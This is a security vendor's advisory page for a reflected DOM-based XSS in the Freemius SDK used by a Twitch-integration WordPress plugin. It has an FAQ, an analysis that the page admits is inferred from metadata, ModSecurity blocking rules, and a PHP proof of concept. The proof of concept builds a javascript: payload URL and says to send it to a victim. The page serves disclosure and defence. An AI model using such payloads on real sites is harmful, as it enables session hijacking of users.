What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK used by various WordPress plugins, including streamweasels-twitch-integration. It allows unauthenticated attackers to inject malicious scripts via the ‘url’ parameter in crafted URLs.

How does this vulnerability work?

The vulnerability occurs when the Freemius SDK processes the ‘url’ parameter without proper input sanitization. An attacker can craft a URL containing a JavaScript payload, and if a user clicks this link, the script executes in their browser, potentially leading to session hijacking or other malicious actions.

Who is affected by this vulnerability?

Any WordPress site using the Freemius SDK version 2.10.1 or earlier, particularly those with the streamweasels-twitch-integration plugin version 1.9.2 or earlier, is at risk. Site administrators should check their plugin versions against this vulnerability to determine if they are affected.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Freemius SDK and the streamweasels-twitch-integration plugin. If your Freemius SDK version is 2.10.1 or earlier and the plugin version is 1.9.2 or earlier, your site is potentially vulnerable.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2024-13362 is 6.1, categorized as Medium severity. This indicates a moderate risk level, suggesting that while successful exploitation can lead to significant issues, it requires user interaction and does not directly compromise server-side security.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the Freemius SDK and the affected plugins to their latest versions where the issue is resolved. Additionally, ensure that any user input, especially the ‘url’ parameter, is properly sanitized and escaped before being rendered in the DOM.

What specific fixes should developers implement?

Developers should use WordPress’s built-in functions like esc_url_raw() to sanitize the ‘url’ parameter and esc_url() to escape output. They should also avoid directly assigning user-supplied URL parameters to DOM attributes and validate URLs against expected patterns.

What are the potential impacts of exploitation?

Exploitation of this vulnerability can allow attackers to execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, phishing, or redirection to malicious sites. While server-side data remains secure, user accounts may be compromised through social engineering.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can construct a malicious URL containing a JavaScript payload in the ‘url’ parameter. When a user clicks this link, the payload executes in their browser, illustrating the vulnerability’s impact and the need for proper input validation.

What is reflected DOM-based XSS?

Reflected DOM-based XSS is a type of cross-site scripting where the attack payload is reflected off a web server and executed in the user’s browser. It typically occurs when user input is not properly sanitized, allowing attackers to inject scripts that run in the context of the web application.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the affected plugin until a patch is available. Additionally, monitor user interactions and educate users about the risks of clicking unknown links to reduce the likelihood of exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (streamweasels-twitch-integration)

CVE ID CVE-2024-13362

Plugin streamweasels-twitch-integration

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 1.9.2

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):

This vulnerability is a reflected DOM-based XSS in the Freemius framework (version <= 2.10.1), affecting multiple WordPress plugins and themes that embed it, including the streamweasels-twitch-integration plugin (vulnerable up to 1.9.2). The attack vector is a crafted URL with a malicious `url` parameter. When a victim clicks the attacker's link, the injected script executes in their browser session. The CVSS score is 6.1 (Medium), with low impact on confidentiality and integrity, and no impact on availability.

Root Cause: Based on the CWE-79 classification and the vulnerability description, the root cause is insufficient input sanitization and output escaping of the `url` parameter before it is rendered in the DOM. The Freemius SDK likely reads the `url` parameter from the query string and injects it directly into the page's HTML or JavaScript context without proper encoding. The developer likely assumed the `url` parameter would be used only for redirects or API calls, but failed to sanitize it against script injection. This conclusion is inferred from the CWE and description; no code diff is available to confirm the exact injection point.

Exploitation: An unauthenticated attacker crafts a malicious link pointing to any WordPress site using a vulnerable plugin or theme that includes the Freemius SDK. The link includes a `url` parameter containing a JavaScript payload, e.g., `?url=javascript:alert(document.cookie)`. The attacker then tricks the victim into clicking the link (e.g., via phishing email or social engineering). When the victim's browser loads the page, the Freemius SDK reads the `url` parameter and inserts it into the DOM without sanitization, causing the payload to execute. The attack vector is entirely client-side, requiring user interaction (click).

Remediation: The plugin developer should sanitize the `url` parameter using WordPress's built-in `esc_url_raw()` or `sanitize_url()` functions before processing it, and escape output with `esc_url()` when rendering it in the DOM. Additionally, the SDK should avoid directly assigning user-supplied URL parameters to DOM attributes (like `href`, `src`, or `onclick`). A robust fix would also validate that the URL matches an expected pattern (e.g., a valid HTTP/HTTPS URL) and reject any protocol handlers like `javascript:` or `data:`.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser within the context of the WordPress site. This can lead to session hijacking (theft of authentication cookies), redirection to malicious sites, defacement of the page content, or phishing by injecting fake login forms. The attacker cannot directly access server-side data or escalate privileges, but client-side attacks can compromise user accounts or spread through social engineering.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks reflected DOM-based XSS via the 'url' parameter in Freemius SDK endpoints
# Targets the key vulnerable parameter: url containing javascript: or data: protocol handlers
SecRule REQUEST_URI "@rx ^/wp-admin/admin-ajax.php$" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius Reflected XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS:url "@rx ^(javascript|data|vbscript):" "chain"
    SecRule ARGS:action "@streq fs_connect" "t:none"

SecRule REQUEST_URI "@rx ^/wp-content/plugins/[^/]+/freemius/start.php$" 
  "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius Reflected XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS:url "@rx ^(javascript|data|vbscript):" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based XSS via url Parameter

// Assumptions:
// 1. The target WordPress site uses a plugin/theme with Freemius SDK 2.10.1 or earlier.
// 2. The vulnerable parameter is 'url' (as described in the CVE title).
// 3. No authentication is required to trigger the reflected XSS (unauthenticated).

$target_url = 'http://wordpress.local'; // CHANGE THIS to the target WordPress site

$payload = 'javascript:alert(document.domain)';

// Build the malicious URL with the XSS payload in the 'url' parameter
// The exact endpoint might vary; we use a common Freemius handler path
$attack_url = $target_url . '/wp-content/plugins/streamweasels-twitch-integration/freemius/start.php?url=' . urlencode($payload);

// Alternatively, the vulnerability may be triggered via admin-ajax.php with an action
// $attack_url = $target_url . '/wp-admin/admin-ajax.php?action=fs_connect&url=' . urlencode($payload);

echo "[+] Atomic Edge Research - CVE-2024-13362 PoCn";
echo "[+] Target: $target_urln";
echo "[+] Malicious URL: $attack_urln";
echo "[+] Send this link to the victim. When clicked, the JavaScript payload will execute.nn";

// Optional: Simulate the request (doesn't execute JS server-side, just retrieves the page)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP response code: $http_coden";
if ($http_code == 200) {
    echo "[+] The payload is likely reflected in the response (check for 'javascript:alert' in the HTML source).n";
} else {
    echo "[!] Unexpected response code; the attack may require a different endpoint or the victim's browser to execute.n";
}

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK used by various WordPress plugins, including streamweasels-twitch-integration. It allows unauthenticated attackers to inject malicious scripts via the ‘url’ parameter in crafted URLs.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability occurs when the Freemius SDK processes the ‘url’ parameter without proper input sanitization. An attacker can craft a URL containing a JavaScript payload, and if a user clicks this link, the script executes in their browser, potentially leading to session hijacking or other malicious actions.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Freemius SDK version 2.10.1 or earlier, particularly those with the streamweasels-twitch-integration plugin version 1.9.2 or earlier, is at risk. Site administrators should check their plugin versions against this vulnerability to determine if they are affected.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Freemius SDK and the streamweasels-twitch-integration plugin. If your Freemius SDK version is 2.10.1 or earlier and the plugin version is 1.9.2 or earlier, your site is potentially vulnerable.
What is the CVSS score and what does it mean?
Understanding risk assessment
The CVSS score for CVE-2024-13362 is 6.1, categorized as Medium severity. This indicates a moderate risk level, suggesting that while successful exploitation can lead to significant issues, it requires user interaction and does not directly compromise server-side security.
How can I mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Freemius SDK and the affected plugins to their latest versions where the issue is resolved. Additionally, ensure that any user input, especially the ‘url’ parameter, is properly sanitized and escaped before being rendered in the DOM.
What specific fixes should developers implement?
Developer remediation steps
Developers should use WordPress’s built-in functions like esc_url_raw() to sanitize the ‘url’ parameter and esc_url() to escape output. They should also avoid directly assigning user-supplied URL parameters to DOM attributes and validate URLs against expected patterns.
What are the potential impacts of exploitation?
Consequences of successful attacks
Exploitation of this vulnerability can allow attackers to execute arbitrary JavaScript in the victim’s browser, leading to session hijacking, phishing, or redirection to malicious sites. While server-side data remains secure, user accounts may be compromised through social engineering.
How does the proof of concept demonstrate the issue?
Understanding the demonstration code
The proof of concept shows how an attacker can construct a malicious URL containing a JavaScript payload in the ‘url’ parameter. When a user clicks this link, the payload executes in their browser, illustrating the vulnerability’s impact and the need for proper input validation.
What is reflected DOM-based XSS?
Defining the attack type
Reflected DOM-based XSS is a type of cross-site scripting where the attack payload is reflected off a web server and executed in the user’s browser. It typically occurs when user input is not properly sanitized, allowing attackers to inject scripts that run in the context of the web application.
What should I do if I cannot update the plugin immediately?
Interim measures
If immediate updates are not possible, consider disabling the affected plugin until a patch is available. Additionally, monitor user interactions and educate users about the risks of clicking unknown links to reduce the likelihood of exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations